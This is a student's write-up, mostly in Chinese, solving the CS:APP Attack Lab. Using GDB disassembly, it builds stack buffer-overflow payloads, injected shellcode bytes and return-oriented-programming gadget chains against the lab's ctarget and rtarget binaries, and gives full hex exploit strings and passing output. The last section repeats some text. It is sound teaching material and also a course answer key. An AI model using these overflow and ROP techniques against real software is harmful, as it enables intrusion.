
  • 00 Prerequisite
  • Part 1: Code injection
    • 1.1 phase_1
    • 1.2 phase_2
    • 1.3 phase_3
  • Part2: Returned-Oriented Programming
    • 2.1 phase_4
    • 2.2 Phase_5

00 Prerequisite


 But to be a good person you also know what the bet have to know what the bad people do, so part of it is to become more effective as a force for good.

Part 1: Code injection

关于Attack的,攻击两个c代码,分别是ctargetrtarget,前3个阶段是关于 ctarget 后面2个是关于rtarget的,Code injection and Return-oriented programming.


void test()
{int val;val = getbuf();printf("No exploit. Getbuf returned 0x%x\n", val);

关于getbuf实际上是在模拟c语言的库函数gets,这类函数容易出现Overunning on buffer 的现象

1 unsigned getbuf()
2 {3 char buf[BUFFER_SIZE];
4 Gets(buf);
5 return 1;
6 }

运用GDB调试 ctarget


disas test
Dump of assembler code for function test:0x0000000000401968 <+0>: sub    $0x8,%rsp // 分配栈帧0x000000000040196c <+4>: mov    $0x0,%eax0x0000000000401971 <+9>: callq  0x4017a8 <getbuf>0x0000000000401976 <+14>:  mov    %eax,%edx // 返回值 -> %edx// 准备调用 printf 函数0x0000000000401978 <+16>: mov    $0x403188,%esi // 0x403188 -> %esi0x000000000040197d <+21>:    mov    $0x1,%edi // Load rdi ready to call fun print0x0000000000401982 <+26>:    mov    $0x0,%eax0x0000000000401987 <+31>:    callq  0x400df0 <__printf_chk@plt>0x000000000040198c <+36>:   add    $0x8,%rsp0x0000000000401990 <+40>:    retq


(gdb) x/s 0x403188
0x403188:   "No exploit.  Getbuf returned 0x%x\n"


(gdb) disas getbuf
Dump of assembler code for function getbuf:0x00000000004017a8 <+0>:   sub    $0x28,%rsp // 分配 40bytes的栈帧0x00000000004017ac <+4>:   mov    %rsp,%rdi0x00000000004017af <+7>: callq  0x401a40 <Gets>0x00000000004017b4 <+12>:    mov    $0x1,%eax0x00000000004017b9 <+17>:    add    $0x28,%rsp0x00000000004017bd <+21>:   retq
End of assembler dump.
disas Gets
Dump of assembler code for function Gets:0x0000000000401a40 <+0>: push   %r120x0000000000401a42 <+2>:  push   %rbp0x0000000000401a43 <+3>:  push   %rbx0x0000000000401a44 <+4>:  mov    %rdi,%r120x0000000000401a47 <+7>: movl   $0x0,0x2036b3(%rip)        # 0x605104 <gets_cnt>0x0000000000401a51 <+17>:   mov    %rdi,%rbx0x0000000000401a54 <+20>:    jmp    0x401a67 <Gets+39>0x0000000000401a56 <+22>:    lea    0x1(%rbx),%rbp0x0000000000401a5a <+26>:   mov    %al,(%rbx)0x0000000000401a5c <+28>:   movzbl %al,%edi0x0000000000401a5f <+31>: callq  0x4019a0 <save_char>0x0000000000401a64 <+36>:   mov    %rbp,%rbx0x0000000000401a67 <+39>:    mov    0x202a62(%rip),%rdi        # 0x6044d0 <infile>0x0000000000401a6e <+46>: callq  0x400dc0 <_IO_getc@plt>0x0000000000401a73 <+51>:   cmp    $0xffffffff,%eax0x0000000000401a76 <+54>: je     0x401a7d <Gets+61>0x0000000000401a78 <+56>:    cmp    $0xa,%eax0x0000000000401a7b <+59>:    jne    0x401a56 <Gets+22>0x0000000000401a7d <+61>:    movb   $0x0,(%rbx)0x0000000000401a80 <+64>:  mov    $0x0,%eax
--Type <RET> for more, q to quit, c to continue without paging--y0x0000000000401a85 <+69>: callq  0x4019f8 <save_term>0x0000000000401a8a <+74>:   mov    %r12,%rax0x0000000000401a8d <+77>:    pop    %rbx0x0000000000401a8e <+78>: pop    %rbp0x0000000000401a8f <+79>: pop    %r120x0000000000401a91 <+81>: retq
End of assembler dump.

1.1 phase_1


1 void touch1()
2 {3 vlevel = 1; /* Part of validation protocol */4 printf("Touch1!: You called touch1()\n");5 validate(1);6 exit(0);
7 }
(gdb) disas touch1
Dump of assembler code for function touch1:0x00000000004017c0 <+0>:   sub    $0x8,%rsp0x00000000004017c4 <+4>: movl   $0x1,0x202d0e(%rip)        # 0x6044dc <vlevel>0x00000000004017ce <+14>: mov    $0x4030c5,%edi // "Touch1!: You called touch1()"0x00000000004017d3 <+19>:   callq  0x400cc0 <puts@plt>0x00000000004017d8 <+24>:   mov    $0x1,%edi0x00000000004017dd <+29>:    callq  0x401c8d <validate>0x00000000004017e2 <+34>:    mov    $0x0,%edi0x00000000004017e7 <+39>:    callq  0x400e40 <exit@plt>
End of assembler dump.

设计ans1.txt里面,前40个字节填充任意,故意在40 字节之后,写入0x00000000004017c0

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00

使用下面命令,将16进制,转变成我们需要输入的字符串的形式,00 -> 0x30 01 -> 0x31 关于ASCII 字符的转变。

./hex2raw < ans1.txt  > ans1_raw.txt
./ctarget -q  < ans1_raw.txt

结果为,调用成功,改变了test内调用函数 getbuf之后的返回地址。

dargon@dd:~/桌面/CSAPP/lab3_attack/target1$ ./ctarget -q  < ans1_raw.txt
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:user id   bovikcourse 15213-f15lab    attacklabresult 1:PASS:0xffffffff:ctarget:1:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 17 40 00 00 00 00 00

1.2 phase_2


1 void touch2(unsigned val)62 {    3 vlevel = 2; /* Part of validation protocol */    4 if (val == cookie) {        5 printf("Touch2!: You called touch2(0x%.8x)\n", val);        6 validate(2);    7 } else {        8 printf("Misfire: You called touch2(0x%.8x)\n", val);        9 fail(2);    10 }    11 exit(0);12 }
(gdb) disas touch2
Dump of assembler code for function touch2:   0x00000000004017ec <+0>:    sub    $0x8,%rsp // allocate stack frame   0x00000000004017f0 <+4>:  mov    %edi,%edx   0x00000000004017f2 <+6>:  movl   $0x2,0x202ce0(%rip)        # 0x6044dc <vlevel>   0x00000000004017fc <+16>:  cmp    0x202ce2(%rip),%edi        # 0x6044e4 <cookie>   0x0000000000401802 <+22>:  jne    0x401824 <touch2+56> # jump mark_1   0x0000000000401804 <+24>: mov    $0x4030e8,%esi   # check address 0x4030e8 "Touch2!: You called touch2(0x%.8x)\n"   0x0000000000401809 <+29>:    mov    $0x1,%edi   0x000000000040180e <+34>: mov    $0x0,%eax   0x0000000000401813 <+39>: callq  0x400df0 <__printf_chk@plt>   0x0000000000401818 <+44>:    mov    $0x2,%edi   0x000000000040181d <+49>: callq  0x401c8d <validate>   0x0000000000401822 <+54>: jmp    0x401842 <touch2+86>   # come here! mark_1   0x0000000000401824 <+56>: mov    $0x403110,%esi   # check address 0x403110 "Misfire: You called touch2(0x%.8x)\n"   0x0000000000401829 <+61>:    mov    $0x1,%edi   0x000000000040182e <+66>: mov    $0x0,%eax   0x0000000000401833 <+71>: callq  0x400df0 <__printf_chk@plt>   0x0000000000401838 <+76>:    mov    $0x2,%edi   0x000000000040183d <+81>: callq  0x401d4f <fail>   0x0000000000401842 <+86>: mov    $0x0,%edi   0x0000000000401847 <+91>: callq  0x400e40 <exit@plt>--Type <RET> for more, q to quit, c to continue without paging--cEnd of assembler dump.

touch2的逻辑相对比较简单,判断输入参数%rdi的是否和 0x202ce2(%rip)相等,也就是说,我们需要输入的参数=0x202ce2(%rip)才可以。


  1. 将函数touch2输入参数,也即是%rdi =0x202ce2(%rip)
  2. getbuf的返回地址设置到函数touch2的入口地址 0x4017ec

  • 针对于第1个问题:



00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00ec 17 40 00 00 00 00 00

执行命令,先打一个breakpoint0x00000000004017fc <+16>: cmp 0x202ce2(%rip),%edi这行代码的位置

(gdb) b *0x4017fcBreakpoint 1 at 0x4017fc: file visible.c, line 42.(gdb) info bNum     Type           Disp Enb Address            What1       breakpoint     keep y   0x00000000004017fc in touch2 at visible.c:42


(gdb) run -q < ans2_raw.txt Starting program: /home/dargon/桌面/CSAPP/lab3_attack/target1/ctarget -q < ans2_raw.txtCookie: 0x59b997faBreakpoint 1, touch2 (val=4160412032) at visible.c:4242    visible.c: 没有那个文件或目录.(gdb) stepi0x0000000000401802  42  in visible.c(gdb) p $edi$1 = -134555264(gdb) p $rip$2 = (void (*)()) 0x401802 <touch2+22>(gdb) p *(int*)($rip+0x202ce2)$3 = 1505335290(gdb) p /x *(int*)($rip+ 0x202ce2)$4 = 0x59b997fa(gdb)
  • 针对于第2个问题:



movq    $0x59b997fa, %rdipushq   $0x4017ecret


gcc -c l2.sobjdump -d l2.o
l2.o:     文件格式 elf64-x86-64Disassembly of section .text:0000000000000000 <.text>:   0:  48 c7 c7 fa 97 b9 59    mov    $0x59b997fa,%rdi   7:    68 ec 17 40 00          pushq  $0x4017ec   c:   c3                      retq




  1. 首先将三条汇编代码写入到缓冲区里面
  2. 利用Level1的方法,将执行完getbuf的返回地址,跳转到缓冲区的位置(根据getbuf找到缓冲区的位置)
  3. 紧接着会执行缓冲区里面的代码,代码的含义
    1. 将参数寄存器%rdi赋值,以供touch2函数参数使用
    2. 将调用函数touch2的返回地址入栈,执行ret的时候,会返回到这个地址,就去执行touch2的内容。

  • 查看getbuf的内容,找到缓冲区的入口地址
Dump of assembler code for function getbuf:0x00000000004017a8 <+0>:   sub    $0x28,%rsp0x00000000004017ac <+4>:    mov    %rsp,%rdi0x00000000004017af <+7>: callq  0x401a40 <Gets>0x00000000004017b4 <+12>:    mov    $0x1,%eax0x00000000004017b9 <+17>:    add    $0x28,%rsp0x00000000004017bd <+21>:   retq
End of assembler dump.


(gdb) b *0x4017ac
Breakpoint 2 at 0x4017ac: file buf.c, line 14.0x00000000004017af    14  in buf.c
(gdb) p $rsp
$5 = (void *) 0x5561dc78




48 c7 c7 fa 97 b9 59 68 # 执行代码
ec 17 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00 # 缓冲区的地址


dargon@dd:~/桌面/CSAPP/lab3_attack/target1$ ./hex2raw < ans2.txt  > ans2_raw.txtdargon@dd:~/桌面/CSAPP/lab3_attack/target1$ ls
ans1_raw.txt  ans2_raw.txt  cookie.txt  farm.c   l2.o  README.txt
ans1.txt      ans2.txt      ctarget     hex2raw  l2.s  rtarget
dargon@dd:~/桌面/CSAPP/lab3_attack/target1$ cat ans2_raw.txt
dargon@dd:~/桌面/CSAPP/lab3_attack/target1$ ./ctarget < ans2_raw.txt
FAILED: Initialization error: Running on an illegal host [dd]
dargon@dd:~/桌面/CSAPP/lab3_attack/target1$ ./ctarget -q < ans2_raw.txt
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:user id   bovikcourse 15213-f15lab    attacklabresult 1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00



地址 内容
0x5561dca0 (getbuf的返回地址)以上是test的栈帧 00 00 00 00 55 61 dc 78
rsp+20 (以下分别对应 getbuf的缓冲区) 00 00 00 00 00 00 00 00
rsp+18 00 00 00 00 00 00 00 00
rsp+10 00 00 00 00 00 00 00 00
rsp+08 00 00 00 00 00 00 00 00
rsp 00 00 00 00 00 00 00 00

1.3 phase_3


1 /* Compare string to hex represention of unsigned value */
2 int hexmatch(unsigned val, char *sval)
3 {4 char cbuf[110];5 /* Make position of check string unpredictable */6 char *s = cbuf + random() % 100;7 sprintf(s, "%.8x", val);8 return strncmp(sval, s, 9) == 0;
9 }11 void touch3(char *sval)
12 {13 vlevel = 3; /* Part of validation protocol */14 if (hexmatch(cookie, sval)) {15 printf("Touch3!: You called touch3(\"%s\")\n", sval);16 validate(3);17 } else {18 printf("Misfire: You called touch3(\"%s\")\n", sval);19 fail(3);20 }21 exit(0);
22 }



Dump of assembler code for function touch3:0x00000000004018fa <+0>:   push   %rbx0x00000000004018fb <+1>:  mov    %rdi,%rbx0x00000000004018fe <+4>: movl   $0x3,0x202bd4(%rip)        # 0x6044dc <vlevel>0x0000000000401908 <+14>: mov    %rdi,%rsi0x000000000040190b <+17>:    mov    0x202bd3(%rip),%edi        # 0x6044e4 <cookie># %rdi -->%rsi(*sval), %edi(cookie)0x0000000000401911 <+23>:   callq  0x40184c <hexmatch>0x0000000000401916 <+28>:    test   %eax,%eax0x0000000000401918 <+30>:    je     0x40193d <touch3+67>0x000000000040191a <+32>:  mov    %rbx,%rdx0x000000000040191d <+35>:    mov    $0x403138,%esi0x0000000000401922 <+40>:   mov    $0x1,%edi0x0000000000401927 <+45>:    mov    $0x0,%eax0x000000000040192c <+50>:    callq  0x400df0 <__printf_chk@plt>0x0000000000401931 <+55>:   mov    $0x3,%edi0x0000000000401936 <+60>:    callq  0x401c8d <validate>0x000000000040193b <+65>:    jmp    0x40195e <touch3+100>0x000000000040193d <+67>: mov    %rbx,%rdx0x0000000000401940 <+70>:    mov    $0x403160,%esi0x0000000000401945 <+75>:   mov    $0x1,%edi0x000000000040194a <+80>:    mov    $0x0,%eax0x000000000040194f <+85>:    callq  0x400df0 <__printf_chk@plt>0x0000000000401954 <+90>:   mov    $0x3,%edi0x0000000000401959 <+95>:    callq  0x401d4f <fail>0x000000000040195e <+100>:   mov    $0x0,%edi0x0000000000401963 <+105>:   callq  0x400e40 <exit@plt>
End of assembler dump.


disas test
Dump of assembler code for function test:0x0000000000401968 <+0>: sub    $0x8,%rsp // 分配栈帧0x000000000040196c <+4>: mov    $0x0,%eax0x0000000000401971 <+9>: callq  0x4017a8 <getbuf>0x0000000000401976 <+14>:  mov    %eax,%edx // 返回值 -> %edx// 准备调用 printf 函数0x0000000000401978 <+16>: mov    $0x403188,%esi // 0x403188 -> %esi0x000000000040197d <+21>:    mov    $0x1,%edi // Load rdi ready to call fun print0x0000000000401982 <+26>:    mov    $0x0,%eax0x0000000000401987 <+31>:    callq  0x400df0 <__printf_chk@plt>0x000000000040198c <+36>:   add    $0x8,%rsp0x0000000000401990 <+40>:    retq
(gdb) disas getbuf
Dump of assembler code for function getbuf:0x00000000004017a8 <+0>:   sub    $0x28,%rsp // 分配 40bytes的栈帧0x00000000004017ac <+4>:   mov    %rsp,%rdi0x00000000004017af <+7>: callq  0x401a40 <Gets>0x00000000004017b4 <+12>:    mov    $0x1,%eax0x00000000004017b9 <+17>:    add    $0x28,%rsp0x00000000004017bd <+21>:   retq
End of assembler dump.



(gdb) b *0x4017a8
Breakpoint 1 at 0x4017a8: file buf.c, line 12.
(gdb) info b
Num     Type           Disp Enb Address            What
1       breakpoint     keep y   0x00000000004017a8 in getbuf at buf.c:12
(gdb) r -q
Starting program: /home/dargon/桌面/CSAPP/lab3_attack/target1/ctarget -q
Cookie: 0x59b997faBreakpoint 1, getbuf () at buf.c:12
12  buf.c: 没有那个文件或目录.
(gdb) p $rsp
$1 = (void *) 0x5561dca0
(gdb) p /x  *(int*)($rsp)
$2 = 0x401976


(gdb) p $rsp
$3 = (void *) 0x5561dc78

可以看出未分配之前的testrsp =0x5561dca0里面的内容即是 *rsp =0x401976对应于getbuf的返回地址。



地址 内容
0x5561dca0 (getbuf的返回地址)以上是test的栈帧 00 00 00 00 00 40 19 76
rsp+20 (以下分别对应 getbuf的缓冲区) 00 00 00 00 00 00 00 00
rsp+18 00 00 00 00 00 00 00 00
rsp+10 00 00 00 00 00 00 00 00
rsp+08 00 00 00 00 00 00 00 00
rsp 00 00 00 00 00 00 00 00


我们调用touch3的时候需要传递给它一个 *sval一个字符串数组的起始地址,为防止在getbuf的缓冲区里面被覆盖,将该cookie =0x59b997fa的字符串放在test的栈帧0x5561dca8里面,然后在利用缓冲区溢出将 getbuf 的返回地址设置成rsp,使用level2里面的技巧。

movq $0x5561dca8 %rdi
pushq  $0x4018fa


l3.o:     文件格式 elf64-x86-64Disassembly of section .text:0000000000000000 <.text>:0: 48 c7 c7 a8 dc 61 55    mov    $0x5561dca8,%rdi7:   68 fa 18 40 00          pushq  $0x4018fac:  c3                      retq

所以构建 注入代码 ,

  1. 代码溢出准备返回到0x5561dc78
  2. cookie =0x59b997fa写成字符串的形式应该是35 39 62 39 39 37 66 61放置到test的栈帧中0x5561dca8位置处。
48 c7 c7 a8 dc 61 55 68
fa 18 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
# 以上填补 40字节的缓冲区
78 dc 61 55 00 00 00 00 <- getbuf 的返回地址
35 39 62 39 39 37 66 61


dargon@dd:~/桌面/CSAPP/lab3_attack/target1$ ./ctarget -q < ans3_raw.txt
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:user id   bovikcourse 15213-f15lab    attacklabresult 1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61

分析此时的栈帧,这里需要换一个位置存储 cookie试一下如何

地址 内容
0x5561dca8 (存储cookie的地方) 61 66 37 39 39 62 39 35
0x5561dca0 (getbuf的返回地址)以上是test的栈帧 00 00 00 00 55 61 dc 78
rsp+20 (以下分别对应 getbuf的缓冲区) 00 00 00 00 00 00 00 00
rsp+18 00 00 00 00 00 00 00 00
rsp+10 00 00 00 00 00 00 00 00
rsp+08 00 00 00 00 00 00 00 00
rsp 00 00 00 00 00 00 00 00



Part2: Returned-Oriented Programming

2.1 phase_4


  1. 栈的位置随机化
  2. 栈里面的内容是 不可执行的non- executable



(gdb) disas test
Dump of assembler code for function test:0x0000000000401968 <+0>: sub    $0x8,%rsp0x000000000040196c <+4>: mov    $0x0,%eax0x0000000000401971 <+9>: callq  0x4017a8 <getbuf>0x0000000000401976 <+14>:  mov    %eax,%edx0x0000000000401978 <+16>:    mov    $0x4032a8,%esi0x000000000040197d <+21>:   mov    $0x1,%edi0x0000000000401982 <+26>:    mov    $0x0,%eax0x0000000000401987 <+31>:    callq  0x400df0 <__printf_chk@plt>0x000000000040198c <+36>:   add    $0x8,%rsp0x0000000000401990 <+40>:    retq
End of assembler dump.
(gdb) disas getbuf

Dump of assembler code for function getbuf:0x00000000004017a8 <+0>:  sub    $0x28,%rsp0x00000000004017ac <+4>:    mov    %rsp,%rdi0x00000000004017af <+7>: callq  0x401b60 <Gets>0x00000000004017b4 <+12>:    mov    $0x1,%eax0x00000000004017b9 <+17>:    add    $0x28,%rsp0x00000000004017bd <+21>:   retq
End of assembler dump.

通过手册可以看到, pop %rdi对应的指令就是5f


  • 第一次尝试


  402b18:    41 5f                   pop    %r15402b1a:  c3                      retq


我们将5f<-->pop %rdi,对于入栈和出栈的方式,

  1. push %reg%rsp的值减8,把寄存器%reg里面的值,放入到[%rsp]里面
  2. pop %reg: 把[%rsp]里面的值给%reg中,%rsp的值再加上8



00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 # 填补40字节缓冲区19 2b 40 00 00 00 00 00 # pop %rdi 对应的getbuf的返回地址
fa 97 b9 59 00 00 00 00 # cookie
ec 17 40 00 00 00 00 00 # touch2 的首地址

当 我尝试运行的时候,jj了,FAIL!

dargon@dd:~/桌面/CSAPP/lab3_attack/target1$ ./rtarget -q < ans4_raw.txt
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
Ouch!: You caused a segmentation fault!
Better luck next time
FAIL: Would have posted the following:user id   bovikcourse 15213-f15lab    attacklabresult 1:FAIL:0xffffffff:rtarget:0:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 2B 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 EC 17 40 00 00 00 00 00

我是没有想到哪里可以引起segmentation fault,也即是可以执行了栈里面的内容

  • 第二次尝试

当我尝试构建expolit strings的时候,利用0x40141b的位置取出5f c3的字码

401419:  69 c0 5f c3 00 00       imul   $0xc35f,%eax,%eax
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 # 填补40字节缓冲区1b 14 40 00 00 00 00 00 # pop %rdi 对应的getbuf的返回地址
fa 97 b9 59 00 00 00 00 # cookie
ec 17 40 00 00 00 00 00 # touch2 的首地址

进行./hex2match之后,依然是segmentation fault

  • 第三次尝试


0000000000401994 <start_farm>:401994:  b8 01 00 00 00          mov    $0x1,%eax401999: c3                      retq   000000000040199a <getval_142>:40199a:  b8 fb 78 90 90          mov    $0x909078fb,%eax40199f:  c3                      retq   00000000004019a0 <addval_273>:4019a0:  8d 87 48 89 c7 c3       lea    -0x3c3876b8(%rdi),%eax4019a6:    c3                      retq   00000000004019a7 <addval_219>:4019a7:  8d 87 51 73 58 90       lea    -0x6fa78caf(%rdi),%eax4019ad:    c3                      retq


  1. mov %rax, %rdi <--> 48 89 c7是从0x4019a2开始的

  2. pop %rax <--> 58是从0x4019ab开始,执行58 90 c3相对来说,多了一个90指令在里面


00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 # 填补40字节缓冲区ab 19 40 00 00 00 00 00 # popq %rax 对应的getbuf的返回地址
fa 97 b9 59 00 00 00 00 # cookie
a2 19 40 00 00 00 00 00 # movq %rax, %rdi
ec 17 40 00 00 00 00 00 # touch2 的首地址


dargon@dd:~/桌面/CSAPP/lab3_attack/target1$ ./hex2raw < ans4.txt > ans4_raw.txt
dargon@dd:~/桌面/CSAPP/lab3_attack/target1$ ./rtarget -q < ans4_raw.txt
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:user id   bovikcourse 15213-f15lab    attacklabresult 1:PASS:0xffffffff:rtarget:2:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 AB 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 A2 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00


在官网write up中有详细说明

Important: The gadget farm is demarcated by functions start_farm and end_farm in your copy of
rtarget. Do not attempt to construct gadgets from other portions of the program code.


2.2 Phase_5



1 /* Compare string to hex represention of unsigned value */
2 int hexmatch(unsigned val, char *sval)
3 {4 char cbuf[110];5 /* Make position of check string unpredictable */6 char *s = cbuf + random() % 100;7 sprintf(s, "%.8x", val);8 return strncmp(sval, s, 9) == 0;
9 }11 void touch3(char *sval)
12 {13 vlevel = 3; /* Part of validation protocol */14 if (hexmatch(cookie, sval)) {15 printf("Touch3!: You called touch3(\"%s\")\n", sval);16 validate(3);17 } else {18 printf("Misfire: You called touch3(\"%s\")\n", sval);19 fail(3);20 }21 exit(0);
22 }

cookie =0x59b997fa转化为字符串

35 39 62 39 39 37 66 61 00 # 对应着 NULL 字符结尾


  1. 由于栈开始了随机化,所以不能单纯地向phase_3那样直接将代码插入到一个绝对地址上然后执行缓冲区内的代码,phase_5的栈是non-executable
  2. getbuf开通了0x28字节的空间,如果把cookie的字符串插入到该空间里,在touch3中,hexmatch开辟了110字节的空间,由于局部变量*s是随机的,在touch3的栈帧空间中是不确定的,可能会覆盖到cookie的内容,所以需要插入更高的地址,所以要存入到touch3更高的地址处test的栈帧中。所以存储cookie字符串的地址,就需要%rsp +bias
  3. 对应的没有直接加法指令,使用farm里面的指令即是
00000000004019d6 <add_xy>:4019d6:  48 8d 04 37             lea    (%rdi,%rsi,1),%rax4019da:    c3                      retq

上述实现%rdi +%rsi =%rax


  • %rsp里的栈指针放到%rdi里面
  • 拿到bias的值,放进%rsi里面
  • 利用 add_xy,把栈指针地址和bias加起来放到%rax,在传到%rdi里面
  • 在调用touch3首地址
movq %rsp, %rax # 把%rsp里的栈指针放到%rax 48 89 e0
movq %rax, %rdi # 把%rsp 放到 %rdi 48 89 c7popq %rax # 58
0x48 # 对应字符串首地址与%rsp的偏移地址 bias
movl %eax, %edx
movl %edx, %ecx
movl %ecx, %esi
lea    (%rdi,%rsi,1),%rax
movq %rax, %rdi
touch3 #地址
35 39 62 39 39 37 66 61 00 #字符串首地址

关于为什么所计算的bias0x48,是在其getbuf返回地址之后,是执行第一句movq %rsp, %rax时,由于每一个gadget后面会跟着retq指令的,所以在执行第一句时,%rsp已经是指向下一句了,即是在执行第一句movq %rsp, %rax赋值给rax的值即是从第二句开始的,所以是按照第二句movq %rax, %rdi的地址进行偏移的,偏移到0x48cookie字符串的位置


00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 # 填补40字节缓冲区,getbuf的栈顶06 1a 40 00 00 00 00 00 # <-- rsp
a2 19 40 00 00 00 00 00 # <-- rsp +0x00
cc 19 40 00 00 00 00 00 # <-- rsp +0x08
48 00 00 00 00 00 00 00 # <-- rsp +0x10dd 19 40 00 00 00 00 00 # <-- rsp +0x18
70 1a 40 00 00 00 00 00 # <-- rsp +0x20
13 1a 40 00 00 00 00 00 # <-- rsp +0x28
d6 19 40 00 00 00 00 00 # <-- rsp +0x30
a2 19 40 00 00 00 00 00 # 以上就是将cookie字符串的地址,给到%rdi <-- rsp +0x38fa 18 40 00 00 00 00 00 # touch3 的首地址 <-- rsp +0x40
35 39 62 39 39 37 66 61 00 # 存放cookie 字符串 <-- rsp +0x48


dargon@dd:~/桌面/CSAPP/lab3_attack/target1$ ./rtarget < ans5_raw.txt -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target rtarget
PASS: Would have posted the following:user id   bovikcourse 15213-f15lab    attacklabresult 1:PASS:0xffffffff:rtarget:3:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 CC 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 70 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00

到%rdi <-- rsp +0x38

fa 18 40 00 00 00 00 00 # touch3 的首地址 <-- rsp +0x40
35 39 62 39 39 37 66 61 00 # 存放cookie 字符串 <-- rsp +0x48

dargon@dd:~/桌面/CSAPP/lab3_attack/target1$ ./rtarget < ans5_raw.txt -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target rtarget
PASS: Would have posted the following:user id   bovikcourse 15213-f15lab    attacklabresult 1:PASS:0xffffffff:rtarget:3:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 CC 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 70 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00

终于将Attack Lab整理完了~


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